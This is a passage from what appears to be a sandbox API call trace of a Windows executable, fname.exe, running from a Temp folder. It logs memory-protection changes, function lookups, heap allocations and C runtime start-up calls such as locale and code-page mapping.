lpAddress=0x126d000, dwSize=0x144, flNewProtect=0x40, lpflOldProtect=0x13625d8 | out: lpflOldProtect=0x13625d8*=0x80) returned 1 [0305.061] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x74580000 [0305.061] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x75640000 [0305.061] VirtualAlloc (lpAddress=0x0, dwSize=0x4e58, flAllocationType=0x1000, flProtect=0x4) returned 0x1e0000 [0305.181] GetProcAddress (hModule=0x77830000, lpProcName="RtlEnterCriticalSection") returned 0x7786f290 [0305.185] GetProcAddress (hModule=0x77830000, lpProcName="RtlAllocateHeap") returned 0x77862bd0 [0305.186] GetProcAddress (hModule=0x77830000, lpProcName="RtlLeaveCriticalSection") returned 0x7786f210 [0305.190] GetProcAddress (hModule=0x77830000, lpProcName="RtlSizeHeap") returned 0x7785bb20 [0305.190] GetProcAddress (hModule=0x77830000, lpProcName="RtlDeleteCriticalSection") returned 0x77880e60 [0305.190] GetProcAddress (hModule=0x77830000, lpProcName="RtlEncodePointer") returned 0x7788f730 [0305.191] GetProcAddress (hModule=0x77830000, lpProcName="RtlDecodePointer") returned 0x7788d830 [0305.191] GetProcAddress (hModule=0x77830000, lpProcName="RtlReAllocateHeap") returned 0x7785efe0 [0305.191] GetProcAddress (hModule=0x77830000, lpProcName="RtlInitializeSListHead") returned 0x77895f60 [0305.192] VirtualProtect (in: lpAddress=0x126d000, dwSize=0x144, flNewProtect=0x40, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x40) returned 1 [0305.192] VirtualProtect (in: lpAddress=0x126d000, dwSize=0x14c, flNewProtect=0x2, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x40) returned 1 [0305.192] VirtualProtect (in: lpAddress=0x128bc24, dwSize=0x3c, flNewProtect=0x2, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x80) returned 1 [0305.203] VirtualProtect (in: lpAddress=0x1140000, dwSize=0x1f8, flNewProtect=0x4, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x2) returned 1 [0305.205] VirtualProtect (in: lpAddress=0x1140000, dwSize=0x1f8, flNewProtect=0x2, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x4) returned 1 [0305.223] VirtualProtect (in: lpAddress=0x1141000, dwSize=0x105e35, flNewProtect=0x4, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x20) returned 1 [0305.237] VirtualProtect (in: lpAddress=0x1247000, dwSize=0x25075, flNewProtect=0x4, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x20) returned 1 [0305.239] VirtualProtect (in: lpAddress=0x126d000, dwSize=0x1f3a0, flNewProtect=0x4, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x2) returned 1 [0305.240] VirtualProtect (in: lpAddress=0x128d000, dwSize=0x1cf0, flNewProtect=0x4, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x8) returned 1 [0305.271] VirtualProtect (in: lpAddress=0x1141000, dwSize=0x105e35, flNewProtect=0x20, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x4) returned 1 [0305.285] VirtualProtect (in: lpAddress=0x1247000, dwSize=0x25075, flNewProtect=0x20, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x4) returned 1 [0305.288] VirtualProtect (in: lpAddress=0x126d000, dwSize=0x1f3a0, flNewProtect=0x2, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x4) returned 1 [0305.289] VirtualProtect (in: lpAddress=0x128d000, dwSize=0x1cf0, flNewProtect=0x8, lpflOldProtect=0x13625f4 | out: lpflOldProtect=0x13625f4*=0x4) returned 1 [0305.291] GetProcessHeap () returned 0x5a0000 [0305.291] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x10) returned 0x5aa680 [0305.291] GetProcessHeap () returned 0x5a0000 [0305.291] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x10) returned 0x5aa698 [0305.295] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0305.297] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff5c | out: lpSystemTimeAsFileTime=0x19ff5c*(dwLowDateTime=0x83a6ba44, dwHighDateTime=0x1d86028)) [0305.297] GetCurrentThreadId () returned 0xbe0 [0305.297] GetCurrentProcessId () returned 0xf94 [0305.297] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff54 | out: lpPerformanceCount=0x19ff54*=2620300854051) returned 1 [0305.298] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0305.302] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0305.302] GetProcAddress (hModule=0x77420000, lpProcName="InitializeCriticalSectionEx") returned 0x774dd740 [0305.303] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0305.303] GetProcAddress (hModule=0x77420000, lpProcName="FlsAlloc") returned 0x774e4490 [0305.303] GetProcAddress (hModule=0x77420000, lpProcName="FlsSetValue") returned 0x774dd7a0 [0305.339] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0305.340] GetProcAddress (hModule=0x77420000, lpProcName="InitializeCriticalSectionEx") returned 0x774dd740 [0305.340] GetProcessHeap () returned 0x5a0000 [0305.341] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0305.341] GetProcAddress (hModule=0x77420000, lpProcName="FlsAlloc") returned 0x774e4490 [0305.341] GetLastError () returned 0x0 [0305.341] GetProcAddress (hModule=0x77420000, lpProcName="FlsGetValue") returned 0x774cf350 [0305.341] GetProcAddress (hModule=0x77420000, lpProcName="FlsSetValue") returned 0x774dd7a0 [0305.341] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x364) returned 0x5b0c90 [0305.342] SetLastError (dwErrCode=0x0) [0305.343] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe00) returned 0x5b1000 [0305.346] GetStartupInfoW (in: lpStartupInfo=0x19fe94 | out: lpStartupInfo=0x19fe94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1252d90, hStdOutput=0x95559bf5, hStdError=0xfffffffe)) [0305.346] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0305.346] GetFileType (hFile=0x38) returned 0x2 [0305.346] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0305.346] GetFileType (hFile=0x3c) returned 0x2 [0305.346] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0305.346] GetFileType (hFile=0x40) returned 0x2 [0305.346] GetCommandLineA () returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe\" " [0305.346] GetCommandLineW () returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe\" " [0305.346] GetACP () returned 0x4e4 [0305.346] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x220) returned 0x5b1e08 [0305.347] IsValidCodePage (CodePage=0x4e4) returned 1 [0305.347] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19feb4 | out: lpCPInfo=0x19feb4) returned 1 [0305.347] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f77c | out: lpCPInfo=0x19f77c) returned 1 [0305.348] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd90, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0305.348] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd90, cbMultiByte=256, lpWideCharStr=0x19f518, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0305.348] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x19f790 | out: lpCharType=0x19f790) returned 1 [0305.348] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd90, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0305.348] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd90, cbMultiByte=256, lpWideCharStr=0x19f4d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0305.348] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0305.348] GetProcAddress (hModule=0x77420000, lpProcName="LCMapStringEx") returned 0x774c95f0 [0305.348] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0305.348] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f2c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0305.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19fc90, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ©Þd\x94Ìþ\x19", lpUsedDefaultChar=0x0) returned 256 [0305.348] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd90, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0305.348] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd90, cbMultiByte=256, lpWideCharStr=0x19f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0305.349] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0305.349] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f2d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0305.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19fb90, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ©Þd\x94Ìþ\x19", lpUsedDefaultChar=0x0) returned 256 [0305.351] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x80) returned 0x5aa9a0 [0305.351] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fcd8, nSize=0x105 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\fname.exe")) returned 0x2e [0305.351] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x74580000 [0305.351] GetProcAddress (hModule=0x74580000, lpProcName="AreFileApisANSI") returned 0x7459f300 [0305.351] AreFileApisANSI () returned 1 [0305.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0305.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe", cchWideChar=-1, lpMultiByteStr=0x128e770, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe", lpUsedDefaultChar=0x0) returned 47 [0305.352] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x37) returned 0x5acfd0 [0305.352] RtlInitializeSListHead (in: ListHead=0x128e530 | out: ListHead=0x128e530) [0305.353] GetLastError () returned 0x0 [0305.353] SetLastError (dwErrCode=0x0) [0305.353] GetEnvironmentStringsW () returned 0x5b2030* [0305.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1382, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1382 [0305.353] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x566) returned 0x5b2b08 [0305.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1382, lpMultiByteStr=0x5b2b08, cbMultiByte=1382, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1382 [0305.353] FreeEnvironmentStringsW (penv=0x5b2030) returned 1 [0305.353] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x98) returned 0x5aa438 [0305.353] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1f) returned 0x5a9fa8 [0305.353] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5aa358 [0305.353] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x37) returned 0x5ad390 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c) returned 0x5b2718 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x31) returned 0x5ad150 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x14) returned 0x5aaa28 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5aaa48 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x31) returned 0x5ad190 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x28) returned 0x5aa4d8 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xd) returned 0x5aa710 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1d) returned 0x5aa508 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x31) returned 0x5ad010 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x15) returned 0x5a89b0 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5a89d0 [0305.354] 